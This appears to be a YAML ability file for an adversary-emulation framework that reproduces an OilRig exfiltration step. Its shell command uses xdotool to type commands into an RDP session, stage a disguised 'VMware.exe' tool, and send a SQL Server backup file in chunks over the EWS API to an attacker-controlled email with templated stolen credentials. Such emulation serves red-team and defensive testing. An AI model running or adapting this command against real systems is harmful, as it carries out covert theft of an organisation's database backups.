ability_id: 885c14a2-bc56-4176-8671-4cb25489ae39
access: {}
additional_info: {}
buckets:
- exfiltration
delete_payload: true
description: "Requires xdotool to be installed on the running machine. \nCreates a\
  \ directory to stage collected data and moves RDAT to the newly created directory.\n\
  Read and exfiltrate the data from sitedata_db.bak in chunks via EWS API to an attacker-controlled\
  \ email.\n"
executors:
- additional_info: {}
  build_target: null
  cleanup: []
  code: null
  command: "sleep 2;\nrdp_pid=$(pgrep -f \"xfreerdp.*/v:localhost\");\nrdp_window=$(xdotool\
    \ search --pid \"$rdp_pid\");\nsleep 3; \nxdotool type --window \"$rdp_window\"\
    \ 'mkdir C:\\Programdata\\Vmware';\nxdotool key --window \"$rdp_window\" Return;\n\
    sleep 3; \nxdotool type --window \"$rdp_window\" 'move C:\\Programdata\\Nt.dat\
    \ C:\\Programdata\\Vmware\\VMware.exe';\nxdotool key --window \"$rdp_window\"\
    \ Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'cd \"C:\\Program Files\\\
    Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Backup\\\"';\nxdotool key --window\
    \ \"$rdp_window\" Return;\nsleep 3;\nxdotool type --window \"$rdp_window\" 'C:\\\
    ProgramData\\Vmware\\VMware.exe --path=\"sitedata_db.bak\" --to=\"#{exfil.target.email}\"\
    \ --from=\"#{initial.target.user}@#{network.domain.name}\" --server=\"#{second.target.ip}\"\
    \ --password='#{initial.target.password}' --chunksize=\"200000\"';\nsleep 1; \n\
    xdotool key --window \"$rdp_window\" Return;\nsleep 15;"
  language: null
  name: sh
  parsers: []
  payloads: []
  platform: linux
  timeout: 60
  uploads: []
  variations: []
name: OilRig Exfiltrate Data via EWS API to attacker-controlled email
plugin: emu
privilege: ''
repeatable: false
requirements: []
singleton: false
tactic: exfiltration
technique_id: T1048.003
technique_name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
  Non-C2 Protocol'
